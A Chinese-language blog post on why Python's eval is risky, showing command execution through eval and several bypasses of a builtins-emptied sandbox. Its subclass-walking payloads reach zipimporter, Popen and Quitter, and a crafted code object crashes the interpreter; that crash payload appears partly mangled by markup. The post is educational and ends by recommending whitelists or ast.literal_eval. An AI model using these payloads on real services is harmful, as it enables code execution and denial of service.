python 为什么说eval要慎用


Posted in Python onMarch 26, 2019

eval前言

In [1]: eval("2+3")
Out[1]: 5

In [2]: eval('[x for x in range(9)]')
Out[2]: [0, 1, 2, 3, 4, 5, 6, 7, 8]

当内存中的内置模块含有os的话,eval同样可以做到命令执行:

In [3]: import os

In [4]: eval("os.system('whoami')")
hy-201707271917\administrator
Out[4]: 0

当然,eval只能执行Python的表达式类型的代码,不能直接用它进行import操作,但exec可以。如果非要使用eval进行import,则使用__import__:

In [8]: eval("__import__('os').system('whoami')")
hy-201707271917\administrator
Out[8]: 0

在实际的代码中,往往有使用客户端数据带入eval中执行的需求。比如动态模块的引入,举个栗子,一个在线爬虫平台上爬虫可能有多个并且位于不同的模块中,服务器端但往往只需要调用用户在客户端选择的爬虫类型,并通过后端的exec或者eval进行动态调用,后端编码实现非常方便。但如果对用户的请求处理不恰当,就会造成严重的安全漏洞。

安全”使用eval

现在提倡最多的就是使用eval的后两个参数来设置函数的白名单:

Eval函数的声明为eval(expression[, globals[, locals]])

其中,第二三个参数分别指定能够在eval中使用的函数等,如果不指定,默认为globals()和locals()函数中 包含的模块和函数。

>>> import os
>>> 'os' in globals()
True
>>> eval('os.system('whoami')')
win-20140812chjadministrator
0
>>> eval('os.system('whoami')',{},{})
Traceback (most recent call last):
 File "", line 1, in 
 File "", line 1, in 
NameError: name 'os' is not defined

如果指定只允许调用abs函数,可以使用下面的写法:

>>> eval('abs(-20)',{'abs':abs},{'abs':abs})
20
>>> eval('os.system('whoami')',{'abs':abs},{'abs':abs})
Traceback (most recent call last):
 File "", line 1, in 
 File "", line 1, in 
NameError: name 'os' is not defined
>>> eval('os.system('whoami')')
win-20140812chjadministrator
0

使用这种方法来防护,确实可以起到一定的作用,但是,这种处理方法可能会被绕过,从而造成其他问题!

绕过执行代码1

被绕过的情景如下,小明知道了eval会带来一定的安全风险,所以使用如下的手段去防止eval执行任意代码:

env = {}
env["locals"] = None
env["globals"] = None
env["__name__"] = None
env["__file__"] = None
env["__builtins__"] = None
 
eval(users_str, env)

Python中的__builtins__是内置模块,用来设置内置函数的模块。比如熟悉的abs,open等内置函数,都是在该模块中以字典的方式存储的,下面两种写法是等价的:

>>> __builtins__.abs(-20)
20
>>> abs(-20)
20

我们也可以自定义内置函数,并像使用Python中的内置函数一样使用它们:

>>> def hello():
...  print 'shabi'
>>> __builtin__.__dict__['say_hello'] = hello
>>> say_hello()
shabi

小明将eval函数的作用域中的内置模块设置为None,好像看起来很彻底了,但依然可以被绕过。__builtins__是__builtin__的一个引用,在__main__模块下,两者是等价的:

>>> id(__builtins__)
3549136
>>> id(__builtin__)
3549136

根据乌云drops提到的方法,使用如下代码即可:

[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")

上面的代码首先利用__class__和__subclasses__动态加载了object对象,这是因为eval中无法直接使用object。然后使用object的子类的zipimporter对egg压缩文件中的configobj模块进行导入,并调用其内置模块中的os模块从而实现命令执行,当然,前提是要有configobj的egg文件。 configobj模块很有意思,居然内置了os模块:

>>> "os" in configobj.__dict__
True
>>> import urllib
>>> "os" in urllib.__dict__
True
>>> import urllib2
>>> "os" in urllib2.__dict__
True
>>> configobj.os.system("whoami")
win-20140812chjadministrator
0

 和configobj类似的模块如urllib,urllib2,setuptools等都有os的内置,理论上使用哪个都行。 如果无法下载egg压缩文件,可以下载带有setup.py的文件夹,加入:

from setuptools import setup, find_packages

然后执行:

python setup.py bdist_egg

就可以在dist文件夹中找到对应的egg文件。 绕过demo如下:

>>> env = {}
>>> env["locals"] = None
>>> env["globals"] = None
>>> env["__name__"] = None
>>> env["__file__"] = None
>>> env["__builtins__"] = None
>>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"
>>> eval(users_str, env)
win-20140812chjadministrator
0
>>> eval(users_str, {}, {})
win-20140812chjadministrator
0

拒绝服务攻击1

object的子类中有很多有趣的东西,执行以下代码查看:

[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]

这里我就不输出结果了,如果你执行的话,可以看到很多有趣的模块,比如file,zipimporter,Quitter等。经过测试,file的构造函数是被解释器沙箱隔离的。 简单的,或者直接使object暴露出的子类Quitter进行退出:

>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__
 == 'Quitter'][0](0)()", {'__builtins__':None})

C:/>

如果运气好,遇到对方程序中导入了os等敏感模块,那么Popen就可以用,并且绕过__builins__为空的限制,例子如下:

>>> import subprocess
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None})
 
>>>
正在 Ping 127.0.0.1 具有 32 字节的数据:
来自 127.0.0.1 的回复: 字节=32 时间>>

事实上,这种情况非常多,比如导入os模块,一般用来处理路径问题。所以说,遇到这种情况,完全可以列举大量的功能函数,来探测目标object的子类中是否含有一些危险的函数可以直接使用。

拒绝服务攻击2

同样,我们甚至可以绕过__builtins__为None,造成一次拒绝服务攻击,Payload(来自老外blog)如下:

>>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()', {"__builtins__":None})

运行上面的代码,Python直接crash掉了,造成拒绝服务攻击。 原理是通过嵌套的lambda来构造一片代码段,即code对象。为这个code对象分配空的栈,并给出相应的代码字符串,这里是KABOOM,在空栈上执行代码,会出现crash。构造完成后,调用fc函数即可触发,其思路不可谓不淫荡。

总结

从上面的内容我们可以看出,单单将内置模块置为空,是不够的,最好的机制是构造白名单,如果觉得比较麻烦,可以使用ast.literal_eval代替不安全的eval。

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持三水点靠木。

Python 相关文章推荐
python爬虫面试宝典(常见问题)
Mar 02 Python
pandas 实现将重复表格去重,并重新转换为表格的方法
Apr 18 Python
好的Python培训机构应该具备哪些条件
May 23 Python
python中的decorator的作用详解
Jul 26 Python
python 为什么说eval要慎用
Mar 26 Python
PyCharm搭建Spark开发环境实现第一个pyspark程序
Jun 13 Python
Django REST framework 视图和路由详解
Jul 19 Python
windows中安装Python3.8.0的实现方法
Nov 19 Python
解决使用python print打印函数返回值多一个None的问题
Apr 09 Python
Python基于pip实现离线打包过程详解
May 15 Python
keras 如何保存最佳的训练模型
May 25 Python
Python类super()及私有属性原理解析
Jun 15 Python
Python eval的常见错误封装及利用原理详解
Mar 26 #Python
Python骚操作之动态定义函数
Mar 26 #Python
python 将有序数组转换为二叉树的方法
Mar 26 #Python
浅谈Python爬虫基本套路
Mar 25 #Python
我用Python抓取了7000 多本电子书案例详解
Mar 25 #Python
详解python:time模块用法
Mar 25 #Python
Python minidom模块用法示例【DOM写入和解析XML】
Mar 25 #Python
You might like
用PHP调用数据库的存贮过程!
2006/10/09 PHP
PHP实现克鲁斯卡尔算法实例解析
2014/08/22 PHP
PHP实现获取FLV文件的时间
2015/02/10 PHP
PHP判断是否是微信打开,浏览器打开的方法
2018/03/14 PHP
jQuery+PHP实现图片上传并提交功能
2020/07/27 PHP
Ajax一统天下之Dojo整合篇
2007/03/24 Javascript
jQuery ajax serialize()方法的使用以及常见问题解决
2013/01/27 Javascript
js实现点击注册按钮开始读秒倒计时的小例子
2013/05/11 Javascript
深入领悟JavaScript中的面向对象
2013/11/18 Javascript
JS连接SQL数据库与ACCESS数据库的方法实例
2013/11/21 Javascript
JavaScript常用的返回,自动跳转,刷新,关闭语句汇总
2015/01/13 Javascript
jquery常用函数与方法汇总
2015/09/01 Javascript
常用的js方法合集
2017/03/10 Javascript
在原生不支持的旧环境中添加兼容的Object.keys实现方法
2017/09/11 Javascript
element ui 表格动态列显示空白bug 修复方法
2018/09/04 Javascript
解决Vue.js应用回退或刷新界面时提示用户保存修改问题
2019/11/24 Javascript
JS数组方法concat()用法实例分析
2020/01/18 Javascript
浅谈vue 组件中的setInterval方法和window的不同
2020/07/30 Javascript
vue动画—通过钩子函数实现半场动画操作
2020/08/09 Javascript
一个检测OpenSSL心脏出血漏洞的Python脚本分享
2014/04/10 Python
Python的Scrapy爬虫框架简单学习笔记
2016/01/20 Python
python+mongodb数据抓取详细介绍
2017/10/25 Python
用python实现k近邻算法的示例代码
2018/09/06 Python
python 使用 requests 模块发送http请求 的方法
2018/12/09 Python
Python3 读取Word文件方式
2020/02/13 Python
Python 窗体(tkinter)下拉列表框(Combobox)实例
2020/03/04 Python
python在一个范围内取随机数的简单实例
2020/08/16 Python
python输入中文的实例方法
2020/09/14 Python
OpenCV读取与写入图片的实现
2020/10/13 Python
python 生成正态分布数据,并绘图和解析
2020/12/21 Python
金融专业毕业生自荐信
2014/06/26 职场文书
数学兴趣小组活动总结
2014/07/08 职场文书
传承焦裕禄精神思想汇报2014
2014/09/10 职场文书
新娘婚礼致辞
2015/07/27 职场文书
公司备用金管理制度
2015/08/04 职场文书
创业计划书之珠宝饰品
2019/08/26 职场文书